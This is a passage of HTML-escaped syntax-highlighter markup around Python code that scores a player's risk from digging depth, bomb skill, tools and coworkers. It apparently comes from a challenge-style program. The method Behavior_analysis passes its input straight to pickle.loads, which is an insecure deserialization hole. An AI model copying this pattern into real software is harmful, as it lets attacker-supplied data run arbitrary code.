-webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;10&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-62&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;tool_risk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;5&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-63&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;coworker_risk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;5&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-64&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;arrest_min_point&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;25&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-65&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-66&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;def&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;Behavior_analysis&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;Player&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-67&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;player_info&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;pickle&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;loads&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;Player&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-68&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;risk_point&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;player_info&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;dig_depth&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;dig_risk&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;player_info&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;bomb_Perfection&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;bomb_risk&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;player_info&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;tools&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;tool_risk&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;player_info&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;coworkers&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit 